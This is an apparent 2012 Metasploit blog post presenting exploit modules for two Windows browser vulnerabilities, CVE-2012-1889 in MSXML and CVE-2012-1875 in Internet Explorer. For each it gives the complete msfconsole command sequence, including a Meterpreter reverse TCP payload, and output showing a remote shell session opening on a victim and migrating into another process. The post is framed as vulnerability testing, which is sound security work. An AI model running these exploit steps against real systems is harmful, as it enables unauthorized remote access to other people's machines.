We've been noticing a lot of exploit activities against Microsoft vulnerabilities lately. We decided to look into some of these attacks, and released two modules for CVE-2012-1889 and CVE-2012-1875 within a week of the vulnerabilities' publication for our users to test their systems. Please note that both are very important to any organization using Windows, because one of them is a newly patched bug, while the other is still a zero-day. To test if any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

 

CVE-2012-1889: MSXML Uninitialized Memory Corruption

 

This is an uninitialized memory bug found in MSXML. According to Microsoft, such a component can be loaded from either Internet Explorer and Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is it's still an 0-day hijacking Gmail accounts. That's right, that means if you're using Gmail as well as Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to grow even more dangerous since there's no patch, and it's rather easy to trigger. There is a temporary mitigation from Microsoft by disabling the component and other config tweaks, but obviously, that has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available.

 

Jun 19th, 2012 Update: This module now works for IE6/7/8/9, Windows XP, Vista, and all the way to Windows 7 SP1.

July 10th, 2012 Update: Patch is now available.

 

Here's how you can check with Metasploit if any systems on your network are vulnerable, which is very likely since there is no patch available yet:

 

msf > use exploit/windows/browser/msxml_get_definition_code_exec

msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(msxml_get_definition_code_exec) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb

msf  exploit(msxml_get_definition_code_exec) >

[*]  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb

[*] Server started.

[*] 10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP

[*] 10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500

[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (2856)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 2356

[+] Successfully migrated to process

 

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

 

This is a vulnerability found in the way Internet Explorer handles the same ID property, which accesses a deleted object and results in remote code execution. This has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control server (C&C) is still active at the time of this writing. The Metasploit module shares some similarities with the one found in the wild -- they both bypass DEP/ASLR, use msvcr71.dll, and they both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a quick check for this exploit. However, AVs cannot be used to patch bugs, so we still recommend you to try the Metasploit module anyway to verify if you are still indeed vulnerable.

 

To use this module, simply do the following:

 

msf > use exploit/windows/browser/ms12_037_same_id

msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(ms12_037_same_id) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi

 

[*]  Local IP: http://10.0.1.3:8080/gTHJEKBboMi

[*] Server started.

msf  exploit(ms12_037_same_id) >

[*] 10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi

[*] 10.0.1.79        ms12_037_same_id - Using msvcrt ROP

[*] 10.0.1.79        ms12_037_same_id - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500

[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (3916)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 1680

[+] Successfully migrated to process

 

If you have any questions, let us know in the comments section.  To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/